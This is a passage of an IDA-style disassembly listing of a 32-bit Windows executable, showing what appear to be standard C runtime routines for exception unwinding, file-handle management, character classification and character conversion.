lea eax, [esp+24h+var_20]
mov large fs:0, eax
loc_40EBD6: ; CODE XREF: sub_40EBAD:loc_40EC1D�j
mov eax, [esp+24h+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_40EC1F
cmp [esp+24h+arg_4], 0FFFFFFFFh
jz short loc_40EBF2
cmp esi, [esp+24h+arg_4]
jbe short loc_40EC1F
loc_40EBF2: ; CODE XREF: sub_40EBAD+3D�j
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov [esp+24h+var_18], ecx
mov [eax+0Ch], ecx
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_40EC1D
push 101h
mov eax, [ebx+esi*4+8]
call sub_40EC5D
mov eax, [ebx+esi*4+8]
call sub_40EC7C
loc_40EC1D: ; CODE XREF: sub_40EBAD+57�j
jmp short loc_40EBD6
; ---------------------------------------------------------------------------
loc_40EC1F: ; CODE XREF: sub_40EBAD+36�j
; sub_40EBAD+43�j
mov ecx, [esp+24h+var_20]
mov large fs:0, ecx
add esp, 18h
pop edi
pop esi
pop ebx
retn
sub_40EBAD endp
; ---------------------------------------------------------------------------
xor eax, eax
mov ecx, large fs:0
cmp dword ptr [ecx+4], offset loc_40EB68
jnz short locret_40EC53
mov edx, [ecx+0Ch]
mov edx, [edx+0Ch]
cmp [ecx+8], edx
jnz short locret_40EC53
mov eax, 1
locret_40EC53: ; CODE XREF: J8@F_7_S:0040EC41�j
; J8@F_7_S:0040EC4C�j
retn
; =============== S U B R O U T I N E =======================================
sub_40EC54 proc near ; CODE XREF: sub_40BEF0+1E�p
; sub_40BEF0+40�p
push ebx
push ecx
mov ebx, offset dword_423FB0
jmp short loc_40EC68
sub_40EC54 endp
; =============== S U B R O U T I N E =======================================
sub_40EC5D proc near ; CODE XREF: sub_4085C8+6E�p
; sub_406640+2099�p ...
arg_0 = dword ptr 4
push ebx
push ecx
mov ebx, offset dword_423FB0
mov ecx, [esp+8+arg_0]
loc_40EC68: ; CODE XREF: sub_40EC54+7�j
mov [ebx+8], ecx
mov [ebx+4], eax
mov [ebx+0Ch], ebp
push ebp
push ecx
push eax
pop eax
pop ecx
pop ebp
pop ecx
pop ebx
retn 4
sub_40EC5D endp
; =============== S U B R O U T I N E =======================================
sub_40EC7C proc near ; CODE XREF: sub_4085C8+7B�p
; sub_40EBAD+6B�p
call eax
retn
sub_40EC7C endp
; =============== S U B R O U T I N E =======================================
sub_40EC7F proc near ; CODE XREF: sub_40E072+2BB�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
test eax, eax
push esi
push edi
jl short loc_40ECE3
cmp eax, ds:dword_433C84
jnb short loc_40ECE3
mov esi, eax
and esi, 1Fh
imul esi, 28h
mov ecx, eax
sar ecx, 5
lea edi, ds:433CA0h[ecx*4]
mov ecx, [edi]
cmp dword ptr [esi+ecx], 0FFFFFFFFh
jnz short loc_40ECE3
cmp ds:dword_423050, 1
push ebx
mov ebx, [esp+0Ch+arg_4]
jnz short loc_40ECD9
sub eax, 0
jz short loc_40ECD0
dec eax
jz short loc_40ECCB
dec eax
jnz short loc_40ECD9
push ebx
push 0FFFFFFF4h
jmp short loc_40ECD3
; ---------------------------------------------------------------------------
loc_40ECCB: ; CODE XREF: sub_40EC7F+42�j
push ebx
push 0FFFFFFF5h
jmp short loc_40ECD3
; ---------------------------------------------------------------------------
loc_40ECD0: ; CODE XREF: sub_40EC7F+3F�j
push ebx
push 0FFFFFFF6h
loc_40ECD3: ; CODE XREF: sub_40EC7F+4A�j
; sub_40EC7F+4F�j
call ds:dword_41D0BC
loc_40ECD9: ; CODE XREF: sub_40EC7F+3A�j
; sub_40EC7F+45�j
mov eax, [edi]
mov [esi+eax], ebx
xor eax, eax
pop ebx
jmp short loc_40ECF9
; ---------------------------------------------------------------------------
loc_40ECE3: ; CODE XREF: sub_40EC7F+8�j
; sub_40EC7F+10�j ...
call sub_4057D3
mov dword ptr [eax], 9
call sub_4057E6
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
loc_40ECF9: ; CODE XREF: sub_40EC7F+62�j
pop edi
pop esi
retn
sub_40EC7F endp
; =============== S U B R O U T I N E =======================================
sub_40ECFC proc near ; CODE XREF: sub_408A4D+62�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
push ebx
xor ebx, ebx
cmp ecx, ebx
push esi
push edi
jl short loc_40ED64
cmp ecx, ds:dword_433C84
jnb short loc_40ED64
mov esi, ecx
and esi, 1Fh
imul esi, 28h
mov eax, ecx
sar eax, 5
lea edi, ds:433CA0h[eax*4]
mov eax, [edi]
add eax, esi
test byte ptr [eax+4], 1
jz short loc_40ED64
cmp dword ptr [eax], 0FFFFFFFFh
jz short loc_40ED64
cmp ds:dword_423050, 1
jnz short loc_40ED5A
sub ecx, ebx
jz short loc_40ED51
dec ecx
jz short loc_40ED4C
dec ecx
jnz short loc_40ED5A
push ebx
push 0FFFFFFF4h
jmp short loc_40ED54
; ---------------------------------------------------------------------------
loc_40ED4C: ; CODE XREF: sub_40ECFC+46�j
push ebx
push 0FFFFFFF5h
jmp short loc_40ED54
; ---------------------------------------------------------------------------
loc_40ED51: ; CODE XREF: sub_40ECFC+43�j
push ebx
push 0FFFFFFF6h
loc_40ED54: ; CODE XREF: sub_40ECFC+4E�j
; sub_40ECFC+53�j
call ds:dword_41D0BC
loc_40ED5A: ; CODE XREF: sub_40ECFC+3F�j
; sub_40ECFC+49�j
mov eax, [edi]
or dword ptr [esi+eax], 0FFFFFFFFh
xor eax, eax
jmp short loc_40ED79
; ---------------------------------------------------------------------------
loc_40ED64: ; CODE XREF: sub_40ECFC+B�j
; sub_40ECFC+13�j ...
call sub_4057D3
mov dword ptr [eax], 9
call sub_4057E6
mov [eax], ebx
or eax, 0FFFFFFFFh
loc_40ED79: ; CODE XREF: sub_40ECFC+66�j
pop edi
pop esi
pop ebx
retn
sub_40ECFC endp
; =============== S U B R O U T I N E =======================================
sub_40ED7D proc near ; CODE XREF: sub_408A4D+7�p
; sub_408A4D+2F�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, 0FFFFFFFEh
jnz short loc_40ED9D
call sub_4057E6
and dword ptr [eax], 0
call sub_4057D3
mov dword ptr [eax], 9
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_40ED9D: ; CODE XREF: sub_40ED7D+7�j
push esi
xor esi, esi
cmp eax, esi
jl short loc_40EDC6
cmp eax, ds:dword_433C84
jnb short loc_40EDC6
mov ecx, eax
and eax, 1Fh
imul eax, 28h
sar ecx, 5
mov ecx, ds:dword_433CA0[ecx*4]
add eax, ecx
test byte ptr [eax+4], 1
jnz short loc_40EDEA
loc_40EDC6: ; CODE XREF: sub_40ED7D+25�j
; sub_40ED7D+2D�j
call sub_4057E6
mov [eax], esi
call sub_4057D3
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 9
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_40EDEA: ; CODE XREF: sub_40ED7D+47�j
mov eax, [eax]
pop esi
retn
sub_40ED7D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EDEE proc near ; CODE XREF: sub_408AE1+7F�p
; sub_40A34F+7F�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push offset dword_421880
call __SEH_prolog4
mov edi, [ebp+arg_0]
mov eax, edi
sar eax, 5
mov esi, edi
and esi, 1Fh
imul esi, 28h
add esi, ds:dword_433CA0[eax*4]
mov [ebp+var_1C], 1
xor ebx, ebx
cmp [esi+8], ebx
jnz short loc_40EE55
push 0Ah
call sub_4059F7
pop ecx
mov [ebp+ms_exc.disabled], ebx
cmp [esi+8], ebx
jnz short loc_40EE49
push 0FA0h
lea eax, [esi+0Ch]
push eax
call sub_40CB14
pop ecx
pop ecx
test eax, eax
jnz short loc_40EE46
mov [ebp+var_1C], ebx
loc_40EE46: ; CODE XREF: sub_40EDEE+53�j
inc dword ptr [esi+8]
loc_40EE49: ; CODE XREF: sub_40EDEE+3F�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40EE85
loc_40EE55: ; CODE XREF: sub_40EDEE+2F�j
cmp [ebp+var_1C], ebx
jz short loc_40EE77
mov eax, edi
sar eax, 5
and edi, 1Fh
imul edi, 28h
mov eax, ds:dword_433CA0[eax*4]
lea eax, [eax+edi+0Ch]
push eax
call ds:dword_41D168
loc_40EE77: ; CODE XREF: sub_40EDEE+6A�j
mov eax, [ebp+var_1C]
call __SEH_epilog4
retn
sub_40EDEE endp
; =============== S U B R O U T I N E =======================================
sub_40EE80 proc near ; DATA XREF: J8@F_7_S:00421898�o
xor ebx, ebx
mov edi, [ebp+8]
sub_40EE80 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40EE85 proc near ; CODE XREF: sub_40EDEE+62�p
push 0Ah
call sub_40591F
pop ecx
retn
sub_40EE85 endp
; =============== S U B R O U T I N E =======================================
sub_40EE8E proc near ; CODE XREF: sub_408BA4+3�p
; sub_40A421+3�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, eax
and eax, 1Fh
imul eax, 28h
sar ecx, 5
mov ecx, ds:dword_433CA0[ecx*4]
lea eax, [ecx+eax+0Ch]
push eax
call ds:dword_41D16C
retn
sub_40EE8E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EEB0 proc near ; CODE XREF: sub_40E072:loc_40E268�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
; FUNCTION CHUNK AT 0040EF8C SIZE 000000BA BYTES
push 18h
push offset dword_4218A0
call __SEH_prolog4
or [ebp+var_1C], 0FFFFFFFFh
xor edi, edi
mov [ebp+var_24], edi
push 0Bh
call sub_405934
pop ecx
test eax, eax
jnz short loc_40EED9
or eax, 0FFFFFFFFh
jmp loc_40F040
; ---------------------------------------------------------------------------
loc_40EED9: ; CODE XREF: sub_40EEB0+1F�j
push 0Bh
call sub_4059F7
pop ecx
mov [ebp+ms_exc.disabled], edi
loc_40EEE4: ; CODE XREF: sub_40EEB0+109�j
mov [ebp+var_28], edi
cmp edi, 40h
jge loc_40F031
mov esi, ds:dword_433CA0[edi*4]
test esi, esi
jz loc_40EFBE
loc_40EEFF: ; CODE XREF: sub_40EEB0+CB�j
mov [ebp+var_20], esi
mov eax, ds:dword_433CA0[edi*4]
add eax, 500h
cmp esi, eax
jnb loc_40EFB2
test byte ptr [esi+4], 1
jnz short loc_40EF78
cmp dword ptr [esi+8], 0
jnz short loc_40EF5B
push 0Ah
call sub_4059F7
pop ecx
xor ebx, ebx
inc ebx
mov [ebp+ms_exc.disabled], ebx
cmp dword ptr [esi+8], 0
jnz short loc_40EF52
push 0FA0h
lea eax, [esi+0Ch]
push eax
call sub_40CB14
pop ecx
pop ecx
test eax, eax
jnz short loc_40EF4F
mov [ebp+var_24], ebx
jmp short loc_40EF52
; ---------------------------------------------------------------------------
loc_40EF4F: ; CODE XREF: sub_40EEB0+98�j
inc dword ptr [esi+8]
loc_40EF52: ; CODE XREF: sub_40EEB0+84�j
; sub_40EEB0+9D�j
and [ebp+ms_exc.disabled], 0
call sub_40EF83
loc_40EF5B: ; CODE XREF: sub_40EEB0+70�j
cmp [ebp+var_24], 0
jnz short loc_40EF78
lea ebx, [esi+0Ch]
push ebx
call ds:dword_41D168
test byte ptr [esi+4], 1
jz short loc_40EF8C
push ebx
call ds:dword_41D16C
loc_40EF78: ; CODE XREF: sub_40EEB0+6A�j
; sub_40EEB0+AF�j ...
add esi, 28h
jmp short loc_40EEFF
sub_40EEB0 endp
; =============== S U B R O U T I N E =======================================
sub_40EF7D proc near ; DATA XREF: J8@F_7_S:004218C4�o
mov edi, [ebp-28h]
mov esi, [ebp-20h]
sub_40EF7D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40EF83 proc near ; CODE XREF: sub_40EEB0+A6�p
push 0Ah
call sub_40591F
pop ecx
retn
sub_40EF83 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40EEB0
loc_40EF8C: ; CODE XREF: sub_40EEB0+BF�j
cmp [ebp+var_24], 0
jnz short loc_40EF78
mov byte ptr [esi+4], 1
or dword ptr [esi], 0FFFFFFFFh
mov eax, esi
sub eax, ds:dword_433CA0[edi*4]
cdq
push 28h
pop ecx
idiv ecx
mov ecx, edi
shl ecx, 5
add eax, ecx
mov [ebp+var_1C], eax
loc_40EFB2: ; CODE XREF: sub_40EEB0+60�j
cmp [ebp+var_1C], 0FFFFFFFFh
jnz short loc_40F031
inc edi
jmp loc_40EEE4
; ---------------------------------------------------------------------------
loc_40EFBE: ; CODE XREF: sub_40EEB0+49�j
push 28h
push 20h
call sub_40777A
pop ecx
pop ecx
mov [ebp+var_20], eax
test eax, eax
jz short loc_40F031
lea ecx, ds:433CA0h[edi*4]
mov [ecx], eax
add ds:dword_433C84, 20h
loc_40EFE0: ; CODE XREF: sub_40EEB0+151�j
mov edx, [ecx]
add edx, 500h
cmp eax, edx
jnb short loc_40F003
mov byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
mov byte ptr [eax+5], 0Ah
and dword ptr [eax+8], 0
add eax, 28h
mov [ebp+var_20], eax
jmp short loc_40EFE0
; ---------------------------------------------------------------------------
loc_40F003: ; CODE XREF: sub_40EEB0+13A�j
shl edi, 5
mov [ebp+var_1C], edi
mov eax, edi
sar eax, 5
mov ecx, edi
and ecx, 1Fh
imul ecx, 28h
mov eax, ds:dword_433CA0[eax*4]
mov byte ptr [eax+ecx+4], 1
push edi
call sub_40EDEE
pop ecx
test eax, eax
jnz short loc_40F031
or [ebp+var_1C], 0FFFFFFFFh
loc_40F031: ; CODE XREF: sub_40EEB0+3A�j
; sub_40EEB0+106�j ...
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40F046
mov eax, [ebp+var_1C]
loc_40F040: ; CODE XREF: sub_40EEB0+24�j
call __SEH_epilog4
retn
; END OF FUNCTION CHUNK FOR sub_40EEB0
; =============== S U B R O U T I N E =======================================
sub_40F046 proc near ; CODE XREF: sub_40EEB0+188�p
; DATA XREF: J8@F_7_S:004218B8�o
push 0Bh
call sub_40591F
pop ecx
retn
sub_40F046 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F04F proc near ; CODE XREF: sub_408C3C+31�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 10h
push offset dword_4218C8
call __SEH_prolog4
mov eax, [ebp+arg_0]
cmp eax, 0FFFFFFFEh
jnz short loc_40F076
call sub_4057D3
mov dword ptr [eax], 9
loc_40F06E: ; CODE XREF: sub_40F04F+4D�j
or eax, 0FFFFFFFFh
jmp loc_40F120
; ---------------------------------------------------------------------------
loc_40F076: ; CODE XREF: sub_40F04F+12�j
xor ebx, ebx
cmp eax, ebx
jl short loc_40F084
cmp eax, ds:dword_433C84
jb short loc_40F09E
loc_40F084: ; CODE XREF: sub_40F04F+2B�j
; sub_40F04F+6D�j
call sub_4057D3
mov dword ptr [eax], 9
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402F39
add esp, 14h
jmp short loc_40F06E
; ---------------------------------------------------------------------------
loc_40F09E: ; CODE XREF: sub_40F04F+33�j
mov ecx, eax
sar ecx, 5
lea edi, ds:433CA0h[ecx*4]
mov esi, eax
and esi, 1Fh
imul esi, 28h
mov ecx, [edi]
movzx ecx, byte ptr [esi+ecx+4]
and ecx, 1
jz short loc_40F084
push eax
call sub_40EDEE
pop ecx
mov [ebp+ms_exc.disabled], ebx
mov eax, [edi]
test byte ptr [esi+eax+4], 1
jz short loc_40F102
push [ebp+arg_0]
call sub_40ED7D
pop ecx
push eax
call ds:dword_41D0B8
test eax, eax
jnz short loc_40F0F0
call ds:dword_41D0F0
mov [ebp+var_1C], eax
jmp short loc_40F0F3
; ---------------------------------------------------------------------------
loc_40F0F0: ; CODE XREF: sub_40F04F+94�j
mov [ebp+var_1C], ebx
loc_40F0F3: ; CODE XREF: sub_40F04F+9F�j
cmp [ebp+var_1C], ebx
jz short loc_40F111
call sub_4057E6
mov ecx, [ebp+var_1C]
mov [eax], ecx
loc_40F102: ; CODE XREF: sub_40F04F+80�j
call sub_4057D3
mov dword ptr [eax], 9
or [ebp+var_1C], 0FFFFFFFFh
loc_40F111: ; CODE XREF: sub_40F04F+A7�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40F126
mov eax, [ebp+var_1C]
loc_40F120: ; CODE XREF: sub_40F04F+22�j
call __SEH_epilog4
retn
sub_40F04F endp
; =============== S U B R O U T I N E =======================================
sub_40F126 proc near ; CODE XREF: sub_40F04F+C9�p
; DATA XREF: J8@F_7_S:004218E0�o
push dword ptr [ebp+8]
call sub_40EE8E
pop ecx
retn
sub_40F126 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F130 proc near ; CODE XREF: sub_40F17F+21�p
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push [ebp+arg_4]
lea ecx, [ebp+var_10]
call sub_40271F
mov eax, [ebp+var_10]
cmp dword ptr [eax+0ACh], 1
jle short loc_40F160
lea eax, [ebp+var_10]
push eax
push 4
push [ebp+arg_0]
call sub_40CA44
add esp, 0Ch
jmp short loc_40F170
; ---------------------------------------------------------------------------
loc_40F160: ; CODE XREF: sub_40F130+1B�j
mov eax, [eax+0C8h]
mov ecx, [ebp+arg_0]
movzx eax, byte ptr [eax+ecx*2]
and eax, 4
loc_40F170: ; CODE XREF: sub_40F130+2E�j
cmp [ebp+var_4], 0
jz short locret_40F17D
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
locret_40F17D: ; CODE XREF: sub_40F130+44�j
leave
retn
sub_40F130 endp
; =============== S U B R O U T I N E =======================================
sub_40F17F proc near ; CODE XREF: J8@F_7_S:0040901D�p
; J8@F_7_S:00409256�p ...
arg_0 = dword ptr 4
cmp ds:dword_425DE0, 0
jnz short loc_40F19A
mov eax, [esp+arg_0]
mov ecx, ds:off_423668
movzx eax, byte ptr [ecx+eax*2]
and eax, 4
retn
; ---------------------------------------------------------------------------
loc_40F19A: ; CODE XREF: sub_40F17F+7�j
push 0
push [esp+4+arg_0]
call sub_40F130
pop ecx
pop ecx
retn
sub_40F17F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F1A8 proc near ; CODE XREF: sub_40F1FC+23�p
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push [ebp+arg_4]
lea ecx, [ebp+var_10]
call sub_40271F
mov eax, [ebp+var_10]
cmp dword ptr [eax+0ACh], 1
jle short loc_40F1DB
lea eax, [ebp+var_10]
push eax
push 80h
push [ebp+arg_0]
call sub_40CA44
add esp, 0Ch
jmp short loc_40F1ED
; ---------------------------------------------------------------------------
loc_40F1DB: ; CODE XREF: sub_40F1A8+1B�j
mov eax, [eax+0C8h]
mov ecx, [ebp+arg_0]
movzx eax, byte ptr [eax+ecx*2]
and eax, 80h
loc_40F1ED: ; CODE XREF: sub_40F1A8+31�j
cmp [ebp+var_4], 0
jz short locret_40F1FA
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
locret_40F1FA: ; CODE XREF: sub_40F1A8+49�j
leave
retn
sub_40F1A8 endp
; =============== S U B R O U T I N E =======================================
sub_40F1FC proc near ; CODE XREF: J8@F_7_S:00409846�p
; J8@F_7_S:0040991E�p
arg_0 = dword ptr 4
cmp ds:dword_425DE0, 0
jnz short loc_40F219
mov eax, [esp+arg_0]
mov ecx, ds:off_423668
movzx eax, byte ptr [ecx+eax*2]
and eax, 80h
retn
; ---------------------------------------------------------------------------
loc_40F219: ; CODE XREF: sub_40F1FC+7�j
push 0
push [esp+4+arg_0]
call sub_40F1A8
pop ecx
pop ecx
retn
sub_40F1FC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F227 proc near ; CODE XREF: sub_40F276+21�p
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push [ebp+arg_4]
lea ecx, [ebp+var_10]
call sub_40271F
mov eax, [ebp+var_10]
cmp dword ptr [eax+0ACh], 1
jle short loc_40F257
lea eax, [ebp+var_10]
push eax
push 8
push [ebp+arg_0]
call sub_40CA44
add esp, 0Ch
jmp short loc_40F267
; ---------------------------------------------------------------------------
loc_40F257: ; CODE XREF: sub_40F227+1B�j
mov eax, [eax+0C8h]
mov ecx, [ebp+arg_0]
movzx eax, byte ptr [eax+ecx*2]
and eax, 8
loc_40F267: ; CODE XREF: sub_40F227+2E�j
cmp [ebp+var_4], 0
jz short locret_40F274
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
locret_40F274: ; CODE XREF: sub_40F227+44�j
leave
retn
sub_40F227 endp
; =============== S U B R O U T I N E =======================================
sub_40F276 proc near ; CODE XREF: sub_408E42+17�p
; J8@F_7_S:00408FA3�p ...
arg_0 = dword ptr 4
cmp ds:dword_425DE0, 0
jnz short loc_40F291
mov eax, [esp+arg_0]
mov ecx, ds:off_423668
movzx eax, byte ptr [ecx+eax*2]
and eax, 8
retn
; ---------------------------------------------------------------------------
loc_40F291: ; CODE XREF: sub_40F276+7�j
push 0
push [esp+4+arg_0]
call sub_40F227
pop ecx
pop ecx
retn
sub_40F276 endp
; =============== S U B R O U T I N E =======================================
sub_40F29F proc near ; CODE XREF: J8@F_7_S:00408FC5�p
; J8@F_7_S:00409425�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_4]
or ebp, 0FFFFFFFFh
test byte ptr [esi+0Ch], 40h
push edi
jnz loc_40F35C
push esi
call sub_408A20
cmp eax, ebp
pop ecx
mov ebx, offset dword_423BD0
jz short loc_40F2F2
push esi
call sub_408A20
cmp eax, 0FFFFFFFEh
pop ecx
jz short loc_40F2F2
push esi
call sub_408A20
sar eax, 5
push esi
lea edi, ds:433CA0h[eax*4]
call sub_408A20
and eax, 1Fh
imul eax, 28h
add eax, [edi]
pop ecx
pop ecx
jmp short loc_40F2F4
; ---------------------------------------------------------------------------
loc_40F2F2: ; CODE XREF: sub_40F29F+23�j
; sub_40F29F+2F�j
mov eax, ebx
loc_40F2F4: ; CODE XREF: sub_40F29F+51�j
test byte ptr [eax+24h], 7Fh
jnz short loc_40F33B
push esi
call sub_408A20
cmp eax, ebp
pop ecx
jz short loc_40F333
push esi
call sub_408A20
cmp eax, 0FFFFFFFEh
pop ecx
jz short loc_40F333
push esi
call sub_408A20
sar eax, 5
push esi
lea edi, ds:433CA0h[eax*4]
call sub_408A20
and eax, 1Fh
imul eax, 28h
add eax, [edi]
pop ecx
pop ecx
jmp short loc_40F335
; ---------------------------------------------------------------------------
loc_40F333: ; CODE XREF: sub_40F29F+64�j
; sub_40F29F+70�j
mov eax, ebx
loc_40F335: ; CODE XREF: sub_40F29F+92�j
test byte ptr [eax+24h], 80h
jz short loc_40F35C
loc_40F33B: ; CODE XREF: sub_40F29F+59�j
call sub_4057D3
xor edi, edi
push edi
push edi
push edi
push edi
push edi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
loc_40F355: ; CODE XREF: sub_40F29F+C3�j
; sub_40F29F+CE�j ...
mov eax, ebp
loc_40F357: ; CODE XREF: sub_40F29F+11C�j
pop edi
pop esi
pop ebp
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40F35C: ; CODE XREF: sub_40F29F+F�j
; sub_40F29F+9A�j
mov ebx, [esp+10h+arg_0]
cmp ebx, ebp
jz short loc_40F355
mov eax, [esi+0Ch]
test al, 1
jnz short loc_40F373
test al, al
jns short loc_40F355
test al, 2
jnz short loc_40F355
loc_40F373: ; CODE XREF: sub_40F29F+CA�j
xor edi, edi
cmp [esi+8], edi
jnz short loc_40F381
push esi
call sub_40D4FC
pop ecx
loc_40F381: ; CODE XREF: sub_40F29F+D9�j
mov eax, [esi]
cmp eax, [esi+8]
jnz short loc_40F390
cmp [esi+4], edi
jnz short loc_40F355
inc eax
mov [esi], eax
loc_40F390: ; CODE XREF: sub_40F29F+E7�j
dec dword ptr [esi]
test byte ptr [esi+0Ch], 40h
mov eax, [esi]
jz short loc_40F3A3
cmp [eax], bl
jz short loc_40F3A5
inc eax
mov [esi], eax
jmp short loc_40F355
; ---------------------------------------------------------------------------
loc_40F3A3: ; CODE XREF: sub_40F29F+F9�j
mov [eax], bl
loc_40F3A5: ; CODE XREF: sub_40F29F+FD�j
mov eax, [esi+0Ch]
inc dword ptr [esi+4]
and eax, 0FFFFFFEFh
or eax, 1
mov [esi+0Ch], eax
mov eax, ebx
and eax, 0FFh
jmp short loc_40F357
sub_40F29F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F3BD proc near ; CODE XREF: J8@F_7_S:00409566�p
; sub_40F4D0+E�p
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
mov esi, [ebp+arg_4]
xor ebx, ebx
cmp esi, ebx
jz short loc_40F3E1
cmp [ebp+arg_8], ebx
jz short loc_40F3E1
cmp [esi], bl
jnz short loc_40F3E7
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_40F3E1
mov [eax], bx
loc_40F3E1: ; CODE XREF: sub_40F3BD+F�j
; sub_40F3BD+14�j ...
xor eax, eax
loc_40F3E3: ; CODE XREF: sub_40F3BD+5A�j
; sub_40F3BD+BB�j ...
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40F3E7: ; CODE XREF: sub_40F3BD+18�j
push [ebp+arg_C]
lea ecx, [ebp+var_10]
call sub_40271F
mov eax, [ebp+var_10]
cmp [eax+14h], ebx
jnz short loc_40F419
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_40F408
movzx cx, byte ptr [esi]
mov [eax], cx
loc_40F408: ; CODE XREF: sub_40F3BD+42�j
; sub_40F3BD+10B�j
cmp [ebp+var_4], bl
jz short loc_40F414
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40F414: ; CODE XREF: sub_40F3BD+4E�j
xor eax, eax
inc eax
jmp short loc_40F3E3
; ---------------------------------------------------------------------------
loc_40F419: ; CODE XREF: sub_40F3BD+3B�j
lea eax, [ebp+var_10]
push eax
movzx eax, byte ptr [esi]
push eax
call sub_40CA00
test eax, eax
pop ecx
pop ecx
jz short loc_40F4A9
mov eax, [ebp+var_10]
mov ecx, [eax+0ACh]
cmp ecx, 1
jle short loc_40F45F
cmp [ebp+arg_8], ecx
jl short loc_40F45F
xor edx, edx
cmp [ebp+arg_0], ebx
setnz dl
push edx
push [ebp+arg_0]
push ecx
push esi
push 9
push dword ptr [eax+4]
call ds:dword_41D0A0
test eax, eax
mov eax, [ebp+var_10]
jnz short loc_40F46F
loc_40F45F: ; CODE XREF: sub_40F3BD+7B�j
; sub_40F3BD+80�j
mov ecx, [ebp+arg_8]
cmp ecx, [eax+0ACh]
jb short loc_40F48A
cmp [esi+1], bl
jz short loc_40F48A
loc_40F46F: ; CODE XREF: sub_40F3BD+A0�j
cmp [ebp+var_4], bl
mov eax, [eax+0ACh]
jz loc_40F3E3
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
jmp loc_40F3E3
; ---------------------------------------------------------------------------
loc_40F48A: ; CODE XREF: sub_40F3BD+AB�j
; sub_40F3BD+B0�j ...
call sub_4057D3
mov dword ptr [eax], 2Ah
cmp [ebp+var_4], bl
jz short loc_40F4A1
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40F4A1: ; CODE XREF: sub_40F3BD+DB�j
or eax, 0FFFFFFFFh
jmp loc_40F3E3
; ---------------------------------------------------------------------------
loc_40F4A9: ; CODE XREF: sub_40F3BD+6D�j
xor eax, eax
cmp [ebp+arg_0], ebx
setnz al
push eax
push [ebp+arg_0]
mov eax, [ebp+var_10]
push 1
push esi
push 9
push dword ptr [eax+4]
call ds:dword_41D0A0
test eax, eax
jnz loc_40F408
jmp short loc_40F48A
sub_40F3BD endp
; =============== S U B R O U T I N E =======================================
sub_40F4D0 proc near ; CODE XREF: sub_40CE5A+18E�p
; sub_40CE5A+1BC�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 0
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_40F3BD
add esp, 10h
retn
sub_40F4D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40F4F0 proc near ; CODE XREF: J8@F_7_S:00409836�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, [esp+arg_4]
mov ecx, [esp+arg_C]
or ecx, eax
